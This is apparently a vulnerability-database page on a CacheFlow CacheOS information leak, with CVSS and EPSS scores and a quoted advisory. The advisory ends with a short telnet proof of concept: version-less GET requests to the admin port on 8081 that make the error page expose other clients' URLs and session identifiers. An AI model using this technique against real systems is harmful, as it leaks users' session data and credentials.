CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Web administration interface in CacheFlow CacheOS 4.0.13 and earlier allows remote attackers to obtain sensitive information via a series of GET requests that do not end in with HTTP/1.0 or another version string, which causes the information to be leaked in the error message.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
5
AV:N/AC:L/Au:N/C:P/I:N/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
4.19%
–
–
2022-04-03
–
–
4.19%
–
–
2022-07-17
–
–
4.19%
–
–
2023-03-12
–
–
–
0.76%
–
2023-04-16
–
–
–
0.76%
–
2023-04-23
–
–
–
0.75%
–
2023-07-02
–
–
–
0.75%
–
2024-02-11
–
–
–
0.75%
–
2024-03-03
–
–
–
0.75%
–
2024-06-02
–
–
–
0.75%
–
2024-06-02
–
–
–
0.75%
–
2024-11-17
–
–
–
0.75%
–
2024-12-22
–
–
–
0.75%
–
2025-01-19
–
–
–
0.75%
–
2025-03-18
–
–
–
–
6.47%
2025-04-16
–
–
–
–
6.47%
2025-04-16
–
–
–
–
6.47,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
source: https://www.securityfocus.com/bid/3841/info
CacheOS is the firmware designed and distributed with CacheFlow web cache systems. It is maintained and distributed by CacheFlow.
When a user connects to the system via the web administration interface on port 8081, and issues an HTTP standard-compliant request to the system, the system will prevent the user from accessing any information managed by the cache server. However, a user connecting to the system and issuing a request without the HTTP version request type (i.e. HTTP/1.0 or HTTP/1.1) multiple times may gain access to sensitive information. The cache server will leak information such as parts of URLs being accessed by a client currently connected to the cache server.
This problem makes it possible for a user to gather information, and potentially gain access to passwords, userids, or other potentially sensitive information.
localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm
HTTP/1.0 404-Not Found
<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The
request
ed URL "/Secure/Local/console/cmhome.htm
Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234
acbe
&sid=3c234acbec234acbe&ord=1" was not found on this
server.<P></BODY>Connection
closed by foreign host.
